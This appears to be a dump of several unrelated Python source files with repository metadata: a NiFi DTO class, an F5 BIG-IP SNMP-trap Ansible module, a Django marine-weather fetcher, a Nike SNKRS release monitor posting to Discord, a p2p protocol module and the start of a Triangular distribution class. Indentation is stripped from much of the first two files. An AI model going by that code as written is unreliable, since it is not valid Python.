def max_results(self):
"""
Gets the max_results of this ListingRequestDTO.
The maximum number of FlowFileSummary objects to return
:return: The max_results of this ListingRequestDTO.
:rtype: int
"""
return self._max_results
@max_results.setter
def max_results(self, max_results):
"""
Sets the max_results of this ListingRequestDTO.
The maximum number of FlowFileSummary objects to return
:param max_results: The max_results of this ListingRequestDTO.
:type: int
"""
self._max_results = max_results
@property
def state(self):
"""
Gets the state of this ListingRequestDTO.
The current state of the listing request.
:return: The state of this ListingRequestDTO.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""
Sets the state of this ListingRequestDTO.
The current state of the listing request.
:param state: The state of this ListingRequestDTO.
:type: str
"""
self._state = state
@property
def queue_size(self):
"""
Gets the queue_size of this ListingRequestDTO.
The size of the queue
:return: The queue_size of this ListingRequestDTO.
:rtype: QueueSizeDTO
"""
return self._queue_size
@queue_size.setter
def queue_size(self, queue_size):
"""
Sets the queue_size of this ListingRequestDTO.
The size of the queue
:param queue_size: The queue_size of this ListingRequestDTO.
:type: QueueSizeDTO
"""
self._queue_size = queue_size
@property
def flow_file_summaries(self):
"""
Gets the flow_file_summaries of this ListingRequestDTO.
The FlowFile summaries. The summaries will be populated once the request has completed.
:return: The flow_file_summaries of this ListingRequestDTO.
:rtype: list[FlowFileSummaryDTO]
"""
return self._flow_file_summaries
@flow_file_summaries.setter
def flow_file_summaries(self, flow_file_summaries):
"""
Sets the flow_file_summaries of this ListingRequestDTO.
The FlowFile summaries. The summaries will be populated once the request has completed.
:param flow_file_summaries: The flow_file_summaries of this ListingRequestDTO.
:type: list[FlowFileSummaryDTO]
"""
self._flow_file_summaries = flow_file_summaries
@property
def source_running(self):
"""
Gets the source_running of this ListingRequestDTO.
Whether the source of the connection is running
:return: The source_running of this ListingRequestDTO.
:rtype: bool
"""
return self._source_running
@source_running.setter
def source_running(self, source_running):
"""
Sets the source_running of this ListingRequestDTO.
Whether the source of the connection is running
:param source_running: The source_running of this ListingRequestDTO.
:type: bool
"""
self._source_running = source_running
@property
def destination_running(self):
"""
Gets the destination_running of this ListingRequestDTO.
Whether the destination of the connection is running
:return: The destination_running of this ListingRequestDTO.
:rtype: bool
"""
return self._destination_running
@destination_running.setter
def destination_running(self, destination_running):
"""
Sets the destination_running of this ListingRequestDTO.
Whether the destination of the connection is running
:param destination_running: The destination_running of this ListingRequestDTO.
:type: bool
"""
self._destination_running = destination_running
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, ListingRequestDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
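# Minimal usage sketch (not part of the generated client code): construct the DTO
# with a couple of keyword arguments and serialise it back with to_dict(). The
# field values used here are made up for illustration only.
if __name__ == '__main__':
    _listing = ListingRequestDTO(id='abc-123', finished=True, max_results=100)
    _as_dict = _listing.to_dict()
    assert _as_dict['id'] == 'abc-123'
    assert _as_dict['finished'] is True
    assert _as_dict['max_results'] == 100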
| 29.478355
| 479
| 0.60981
|
2fda7b697c034e5bf265008c8a9f966adc351bc3
| 17,595
|
py
|
Python
|
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
library/library/modules/bigip_snmp_trap.py
|
meverett1167/Ansible_Demos
|
dad515d43af19bcb201f31929e03352d09097efc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
module: bigip_snmp_trap
short_description: Manipulate SNMP trap information on a BIG-IP
description:
- Manipulate SNMP trap information on a BIG-IP.
version_added: 2.4
options:
name:
description:
- Name of the SNMP configuration endpoint.
required: True
snmp_version:
description:
- Specifies to which Simple Network Management Protocol (SNMP) version
the trap destination applies.
choices: ['1', '2c']
community:
description:
- Specifies the community name for the trap destination.
destination:
description:
- Specifies the address for the trap destination. This can be either an
IP address or a hostname.
port:
description:
- Specifies the port for the trap destination.
network:
description:
- Specifies the name of the trap network. This option is not supported in
versions of BIG-IP < 12.1.0. If used on versions < 12.1.0, it will simply
be ignored.
- The value C(default) was removed in BIG-IP version 13.1.0. Specifying this
value when configuring a BIG-IP will cause the module to stop and report
an error. The usual remedy is to choose one of the other options, such as
C(management).
choices:
- other
- management
- default
state:
description:
- When C(present), ensures that the resource exists.
- When C(absent), ensures that the resource does not exist.
default: present
choices:
- present
- absent
partition:
description:
- Device partition to manage resources on.
default: Common
version_added: 2.5
notes:
- This module only supports version v1 and v2c of SNMP.
- The C(network) option is not supported on versions of BIG-IP < 12.1.0 because
the platform did not support that option until 12.1.0. If used on versions
< 12.1.0, it will simply be ignored.
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create snmp v1 trap
bigip_snmp_trap:
community: general
destination: 1.2.3.4
name: my-trap1
network: management
port: 9000
snmp_version: 1
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
- name: Create snmp v2 trap
bigip_snmp_trap:
community: general
destination: 5.6.7.8
name: my-trap2
network: default
port: 7000
snmp_version: 2c
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
'''
RETURN = r'''
snmp_version:
description: The new C(snmp_version) configured on the remote device.
returned: changed and success
type: string
sample: 2c
community:
description: The new C(community) name for the trap destination.
returned: changed and success
type: list
sample: secret
destination:
description: The new address for the trap destination in either IP or hostname form.
returned: changed and success
type: string
sample: 1.2.3.4
port:
description: The new C(port) of the trap destination.
returned: changed and success
type: string
sample: 900
network:
description: The new name of the network the SNMP trap is on.
returned: changed and success
type: string
sample: management
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import HAS_F5SDK
from library.module_utils.network.f5.bigip import F5Client
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
try:
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
except ImportError:
from ansible.module_utils.network.f5.bigip import HAS_F5SDK
from ansible.module_utils.network.f5.bigip import F5Client
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
try:
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
api_map = {
'version': 'snmp_version',
'community': 'community',
'host': 'destination'
}
@property
def snmp_version(self):
if self._values['snmp_version'] is None:
return None
return str(self._values['snmp_version'])
@property
def port(self):
if self._values['port'] is None:
return None
return int(self._values['port'])
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
class V3Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
returnables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
api_attributes = [
'version', 'community', 'host', 'port', 'network'
]
@property
def network(self):
if self._values['network'] is None:
return None
network = str(self._values['network'])
if network == 'management':
return 'mgmt'
elif network == 'default':
raise F5ModuleError(
"'default' is not a valid option for this version of BIG-IP. "
"Use either 'management', 'or 'other' instead."
)
else:
return network
class V2Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
returnables = [
'snmp_version', 'community', 'destination', 'port', 'network'
]
api_attributes = [
'version', 'community', 'host', 'port', 'network'
]
@property
def network(self):
if self._values['network'] is None:
return None
network = str(self._values['network'])
if network == 'management':
return 'mgmt'
elif network == 'default':
return ''
else:
return network
class V1Parameters(Parameters):
updatables = [
'snmp_version', 'community', 'destination', 'port'
]
returnables = [
'snmp_version', 'community', 'destination', 'port'
]
api_attributes = [
'version', 'community', 'host', 'port'
]
@property
def network(self):
return None
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.kwargs = kwargs
def exec_module(self):
if self.is_version_without_network():
manager = V1Manager(**self.kwargs)
elif self.is_version_with_default_network():
manager = V2Manager(**self.kwargs)
else:
manager = V3Manager(**self.kwargs)
return manager.exec_module()
def is_version_without_network(self):
"""Is current BIG-IP version missing "network" value support
Returns:
bool: True when it is missing. False otherwise.
"""
version = self.client.api.tmos_version
if LooseVersion(version) < LooseVersion('12.1.0'):
return True
else:
return False
def is_version_with_default_network(self):
"""Is current BIG-IP version missing "default" network value support
Returns:
bool: True when it is missing. False otherwise.
"""
version = self.client.api.tmos_version
if LooseVersion(version) < LooseVersion('13.1.0'):
return True
else:
return False
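# Illustrative sketch (not part of the original module) of the version gating
# above, using a hypothetical TMOS version string. LooseVersion is already
# imported at the top of this module.
if __name__ == '__main__':
    _tmos = '12.0.0'  # hypothetical BIG-IP version
    assert LooseVersion(_tmos) < LooseVersion('12.1.0')  # -> V1Manager ("network" unsupported)
    assert LooseVersion(_tmos) < LooseVersion('13.1.0')  # -> "default" network still accepted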
class BaseManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.have = None
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
changes = self.changes.to_return()
result.update(**changes)
result.update(dict(changed=changed))
return result
def exists(self):
result = self.client.api.tm.sys.snmp.traps_s.trap.exists(
name=self.want.name,
partition=self.want.partition
)
return result
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
if all(getattr(self.want, v) is None for v in self.required_resources):
raise F5ModuleError(
"You must specify at least one of " +
', '.join(self.required_resources)
)
self.create_on_device()
return True
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def update_on_device(self):
params = self.want.api_params()
result = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result.modify(**params)
def create_on_device(self):
params = self.want.api_params()
self.client.api.tm.sys.snmp.traps_s.trap.create(
name=self.want.name,
partition=self.want.partition,
**params
)
def absent(self):
if self.exists():
return self.remove()
return False
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the snmp trap")
return True
def remove_from_device(self):
result = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
if result:
result.delete()
class V3Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V3Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port', 'network'
]
self.want = V3Parameters(params=self.module.params)
self.changes = V3Parameters()
def _set_changed_options(self):
changed = {}
for key in V3Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V3Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V3Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V3Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return V3Parameters(params=result)
class V2Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V2Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port', 'network'
]
self.want = V2Parameters(params=self.module.params)
self.changes = V2Parameters()
def _set_changed_options(self):
changed = {}
for key in V2Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V2Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V2Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V2Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
self._ensure_network(result)
return V2Parameters(params=result)
def _ensure_network(self, result):
# BIG-IP's value for "default" is that the 'network' key does not
# exist. This conflicts with our convention that a missing key
# means "I don't want to change that". Therefore, if we load the
# information from BIG-IP and find that there is no 'network' key,
# that is BIG-IP's way of saying that the network value is
# "default", and we record it as such.
if 'network' not in result:
result['network'] = 'default'
class V1Manager(BaseManager):
def __init__(self, *args, **kwargs):
super(V1Manager, self).__init__(**kwargs)
self.required_resources = [
'version', 'community', 'destination', 'port'
]
self.want = V1Parameters(params=self.module.params)
self.changes = V1Parameters()
def _set_changed_options(self):
changed = {}
for key in V1Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = V1Parameters(params=changed)
def _update_changed_options(self):
changed = {}
for key in V1Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if changed:
self.changes = V1Parameters(params=changed)
return True
return False
def read_current_from_device(self):
resource = self.client.api.tm.sys.snmp.traps_s.trap.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return V1Parameters(params=result)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(
required=True
),
snmp_version=dict(
choices=['1', '2c']
),
community=dict(no_log=True),
destination=dict(),
port=dict(),
network=dict(
choices=['other', 'management', 'default']
),
state=dict(
default='present',
choices=['absent', 'present']
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
if not HAS_F5SDK:
module.fail_json(msg="The python f5-sdk module is required")
try:
client = F5Client(**module.params)
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
module.exit_json(**results)
except F5ModuleError as ex:
cleanup_tokens(client)
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| 30.076923
| 91
| 0.611822
|
e24bac7ea1f67cbed8321d83e01c8d2a15bef7b2
| 1,854
|
py
|
Python
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 1
|
2016-11-28T04:35:06.000Z
|
2016-11-28T04:35:06.000Z
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 160
|
2015-01-01T20:59:29.000Z
|
2016-04-25T13:36:52.000Z
|
homedisplay/info_weather/management/commands/fetch_marine_weather.py
|
ojarva/home-info-display
|
873d022308732baff94d0dc2381cf9dc7dce23b7
|
[
"BSD-3-Clause"
] | 1
|
2015-02-25T21:24:01.000Z
|
2015-02-25T21:24:01.000Z
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from homedisplay.utils import publish_ws
from info_weather.models import MarineDataPoint
import aaltopoiju
import datetime
import json
import requests
class Command(BaseCommand):
args = ''
help = 'Fetches marine weather information'
def handle(self, *args, **options):
ap = aaltopoiju.Aaltopoiju()
data = ap.fetch()
for location in data:
for observation in data[location]["observations"]:
timestamp = timezone.make_aware(
observation["timestamp"], timezone.get_current_timezone())
values = observation
del values["timestamp"]
values["forecast"] = False
datapoint, created = MarineDataPoint.objects.get_or_create(
location=location, timestamp=timestamp, defaults=values)
if not created:
for attr, value in values.iteritems():
setattr(datapoint, attr, value)
datapoint.save()
for forecast in data[location]["forecasts"]:
timestamp = timezone.make_aware(
forecast["timestamp"], timezone.get_current_timezone())
values = forecast
del values["timestamp"]
values["forecast"] = True
datapoint, created = MarineDataPoint.objects.get_or_create(
location=location, timestamp=timestamp, defaults=values)
if not created:
for attr, value in values.iteritems():
setattr(datapoint, attr, value)
datapoint.save()
| 34.981132
| 78
| 0.593312
|
457f8cddc4f054cc99674b90995292fde07387a9
| 3,142
|
py
|
Python
|
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | 2
|
2020-07-25T13:28:25.000Z
|
2020-11-01T15:13:45.000Z
|
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | null | null | null |
main.py
|
GuoooooJing/snkrs_monitor
|
6bcfbe78589f6817125fae617800c95b6e5ddbc0
|
[
"MIT"
] | null | null | null |
import time
import requests
from discord_webhook import DiscordWebhook, DiscordEmbed
url = 'https://api.nike.com/snkrs/content/v1/?country=US&language=en&offset=0&orderBy=published'
webhook_url = 'your discord webhook url'
def check_update(data, previous):
new_dict = {}
extra_dict = {}
new = set()
for i in data:
new.add(i['id'])
if i['id'] in previous:
continue
elif i['interestId']:
info = {}
info['type'] = i['product']['productType']
info['name'] = i['name']
info['color'] = i['product']['colorDescription']
info['price'] = i['product']['price']['msrp']
info['image'] = i['imageUrl']
info['date'] = i['product']['startSellDate']
info['publishType'] = i['product']['publishType']
new_dict[i['id']] = info
else:
info = {}
info['name'] = i['name']
info['image'] = i['imageUrl']
info['date'] = i['publishedDate']
info['desc'] = '\n'.join(i['tags'])
extra_dict[i['id']] = info
return new_dict, extra_dict, new
def update_discord(new, extra, webhook_url):
webhook = DiscordWebhook(url=webhook_url)
for i in new:
embed = DiscordEmbed(title='{}({})'.format(new[i]['name'], new[i]['color']), description='id: {}'.format(i),
color=7395813, timestamp=new[i]['date'])
embed.set_thumbnail(url=new[i]['image'])
embed.set_footer(text="Lacuh time", icon_url="https://cdn.discordapp.com/embed/avatars/0.png")
embed.set_image(url=new[i]['image'])
embed.add_embed_field(name="Lauch Method", value="{}".format(new[i]['publishType']))
embed.add_embed_field(name="Price", value="${}\n".format(new[i]['price']))
embed.add_embed_field(name='Product Type', value=new[i]['type'])
webhook.add_embed(embed)
webhook.execute()
webhook.remove_embed(0)
time.sleep(3)
for i in extra:
embed = DiscordEmbed(title=extra[i]['name'], description='id: {}'.format(i),
color=7395813, timestamp=extra[i]['date'])
embed.set_image(url=extra[i]['image'])
embed.set_footer(text='Published time', icon_url="https://cdn.discordapp.com/embed/avatars/0.png")
embed.set_thumbnail(url=extra[i]['image'])
embed.add_embed_field(name='detail', value=extra[i]['desc'])
webhook.add_embed(embed)
webhook.execute()
webhook.remove_embed(0)
time.sleep(3)
if __name__ == '__main__':
previous = {}
count = 0
while True:
count += 1
count %= 100000
print(count)
jfile = requests.get(url).json()
if 'threads' not in jfile:
print(jfile)
print('skip')
continue
data = jfile['threads']
time.sleep(2)
dic, extra, previous = check_update(data, previous)
update_discord(dic, extra, webhook_url)
print(len(dic))
| 36.534884
| 117
| 0.549332
|
0dff79d11cd3040c89fb9b5d38eb034253346d32
| 9,336
|
py
|
Python
|
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
p2p/protocol.py
|
Gauddel/trinity
|
0b12943ac36f4090abc22fc965e9e9a4f42c6f35
|
[
"MIT"
] | null | null | null |
from abc import ABC
import logging
import operator
import struct
from typing import (
Any,
ClassVar,
Dict,
Generic,
Iterable,
List,
Sequence,
Tuple,
Type,
TypeVar,
Union,
)
from mypy_extensions import (
TypedDict,
)
import snappy
from eth_utils import to_tuple
from eth_utils.toolz import groupby
import rlp
from rlp import sedes
from eth.constants import NULL_BYTE
from p2p._utils import get_devp2p_cmd_id
from p2p.exceptions import (
MalformedMessage,
)
from p2p.transport import Transport
class TypedDictPayload(TypedDict):
pass
PayloadType = Union[
Dict[str, Any],
List[rlp.Serializable],
Tuple[rlp.Serializable, ...],
TypedDictPayload,
]
# A payload to be delivered with a request
TRequestPayload = TypeVar('TRequestPayload', bound=PayloadType, covariant=True)
# for backwards compatibility for internal references in p2p:
_DecodedMsgType = PayloadType
StructureType = Union[
Tuple[Tuple[str, Any], ...],
]
class Command:
_cmd_id: int = None
decode_strict = True
structure: StructureType
_logger: logging.Logger = None
def __init__(self, cmd_id_offset: int, snappy_support: bool) -> None:
self.cmd_id_offset = cmd_id_offset
self.cmd_id = cmd_id_offset + self._cmd_id
self.snappy_support = snappy_support
@property
def logger(self) -> logging.Logger:
if self._logger is None:
self._logger = logging.getLogger(f"p2p.protocol.{type(self).__name__}")
return self._logger
@property
def is_base_protocol(self) -> bool:
return self.cmd_id_offset == 0
def __str__(self) -> str:
return f"{type(self).__name__} (cmd_id={self.cmd_id})"
def encode_payload(self, data: Union[PayloadType, sedes.CountableList]) -> bytes:
if isinstance(data, dict):
if not isinstance(self.structure, tuple):
raise ValueError(
"Command.structure must be a list when data is a dict. Got "
f"{self.structure}"
)
expected_keys = sorted(name for name, _ in self.structure)
data_keys = sorted(data.keys())
if data_keys != expected_keys:
raise ValueError(
f"Keys in data dict ({data_keys}) do not match expected keys ({expected_keys})"
)
data = tuple(data[name] for name, _ in self.structure)
if isinstance(self.structure, sedes.CountableList):
encoder = self.structure
else:
encoder = sedes.List([type_ for _, type_ in self.structure])
return rlp.encode(data, sedes=encoder)
def decode_payload(self, rlp_data: bytes) -> PayloadType:
if isinstance(self.structure, sedes.CountableList):
decoder = self.structure
else:
decoder = sedes.List(
[type_ for _, type_ in self.structure], strict=self.decode_strict)
try:
data = rlp.decode(rlp_data, sedes=decoder, recursive_cache=True)
except rlp.DecodingError as err:
raise MalformedMessage(f"Malformed {type(self).__name__} message: {err!r}") from err
if isinstance(self.structure, sedes.CountableList):
return data
return {
field_name: value
for ((field_name, _), value)
in zip(self.structure, data)
}
def decode(self, data: bytes) -> PayloadType:
packet_type = get_devp2p_cmd_id(data)
if packet_type != self.cmd_id:
raise MalformedMessage(f"Wrong packet type: {packet_type}, expected {self.cmd_id}")
compressed_payload = data[1:]
encoded_payload = self.decompress_payload(compressed_payload)
return self.decode_payload(encoded_payload)
def decompress_payload(self, raw_payload: bytes) -> bytes:
# Do the Snappy Decompression only if Snappy Compression is supported by the protocol
if self.snappy_support:
try:
return snappy.decompress(raw_payload)
except Exception as err:
# log this just in case it's a library error of some kind on valid messages.
self.logger.debug("Snappy decompression error on payload: %s", raw_payload.hex())
raise MalformedMessage from err
else:
return raw_payload
def compress_payload(self, raw_payload: bytes) -> bytes:
# Do the Snappy Compression only if Snappy Compression is supported by the protocol
if self.snappy_support:
return snappy.compress(raw_payload)
else:
return raw_payload
def encode(self, data: PayloadType) -> Tuple[bytes, bytes]:
encoded_payload = self.encode_payload(data)
compressed_payload = self.compress_payload(encoded_payload)
enc_cmd_id = rlp.encode(self.cmd_id, sedes=rlp.sedes.big_endian_int)
frame_size = len(enc_cmd_id) + len(compressed_payload)
if frame_size.bit_length() > 24:
raise ValueError("Frame size has to fit in a 3-byte integer")
# Drop the first byte as, per the spec, frame_size must be a 3-byte int.
header = struct.pack('>I', frame_size)[1:]
# All clients seem to ignore frame header data, so we do the same, although I'm not sure
# why geth uses the following value:
# https://github.com/ethereum/go-ethereum/blob/master/p2p/rlpx.go#L556
zero_header = b'\xc2\x80\x80'
header += zero_header
header = _pad_to_16_byte_boundary(header)
body = _pad_to_16_byte_boundary(enc_cmd_id + compressed_payload)
return header, body
class BaseRequest(ABC, Generic[TRequestPayload]):
"""
Must define command_payload during init. This is the data that will
be sent to the peer with the request command.
"""
# Defined at init time, with specific parameters:
command_payload: TRequestPayload
# Defined as class attributes in subclasses
# outbound command type
cmd_type: Type[Command]
# response command type
response_type: Type[Command]
CapabilityType = Tuple[str, int]
class Protocol(ABC):
transport: Transport
name: ClassVar[str]
version: ClassVar[int]
cmd_length: int = None
# Command classes that this protocol supports.
_commands: Tuple[Type[Command], ...]
_logger: logging.Logger = None
def __init__(self, transport: Transport, cmd_id_offset: int, snappy_support: bool) -> None:
self.transport = transport
self.cmd_id_offset = cmd_id_offset
self.snappy_support = snappy_support
self.commands = [cmd_class(cmd_id_offset, snappy_support) for cmd_class in self._commands]
self.cmd_by_type = {type(cmd): cmd for cmd in self.commands}
self.cmd_by_id = {cmd.cmd_id: cmd for cmd in self.commands}
@property
def logger(self) -> logging.Logger:
if self._logger is None:
self._logger = logging.getLogger(f"p2p.protocol.{type(self).__name__}")
return self._logger
def send_request(self, request: BaseRequest[PayloadType]) -> None:
command = self.cmd_by_type[request.cmd_type]
header, body = command.encode(request.command_payload)
self.transport.send(header, body)
def supports_command(self, cmd_type: Type[Command]) -> bool:
return cmd_type in self.cmd_by_type
@classmethod
def as_capability(cls) -> CapabilityType:
return (cls.name, cls.version)
def __repr__(self) -> str:
return "(%s, %d)" % (self.name, self.version)
CapabilitiesType = Tuple[CapabilityType, ...]
@to_tuple
def match_protocols_with_capabilities(protocols: Sequence[Type[Protocol]],
capabilities: CapabilitiesType) -> Iterable[Type[Protocol]]:
"""
Return the `Protocol` classes that match with the provided `capabilities`
according to the RLPx protocol rules.
- ordered case-sensitive by protocol name
- at most one protocol per name
- discard protocols that are not present in `capabilities`
- use highest version in case of multiple same-name matched protocols
"""
# make a set for faster inclusion checks
capabilities_set = set(capabilities)
# group the protocols by name
proto_groups = groupby(operator.attrgetter('name'), protocols)
for _, homogenous_protocols in sorted(proto_groups.items()):
# for each set of protocols with the same name, sort them in decreasing
# order by their version number.
ordered_protocols = sorted(
homogenous_protocols,
key=operator.attrgetter('version'),
reverse=True,
)
for proto in ordered_protocols:
if proto.as_capability() in capabilities_set:
# select the first protocol we find that is in the provided
# `capabilities` which will be the *highest* version since we
# previously sorted them.
yield proto
break
def _pad_to_16_byte_boundary(data: bytes) -> bytes:
"""Pad the given data with NULL_BYTE up to the next 16-byte boundary."""
remainder = len(data) % 16
if remainder != 0:
data += NULL_BYTE * (16 - remainder)
return data
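# Quick illustrative check (not part of the original module): a 6-byte header is
# padded with ten NULL bytes so the result lands on the next 16-byte boundary.
if __name__ == '__main__':
    _padded = _pad_to_16_byte_boundary(b'\xc2\x80\x80' + b'abc')
    assert len(_padded) == 16
    assert _padded.endswith(NULL_BYTE * 10)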
| 33.342857
| 99
| 0.654135
|
7ee81203286206d50cc2a210f1841b0a36935905
| 11,373
|
py
|
Python
|
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/distributions/triangular.py
|
brianwa84/probability
|
6f8e78d859ac41170be5147c8c7bde54cc5aa83e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Triangular distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import sigmoid as sigmoid_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
class Triangular(distribution.Distribution):
r"""Triangular distribution with `low`, `high` and `peak` parameters.
#### Mathematical Details
The Triangular distribution is specified by two line segments in the plane,
such that:
* The first line segment starts at `(a, 0)` and ends at `(c, z)`.
* The second line segment starts at `(c, z)` and ends at `(b, 0)`.
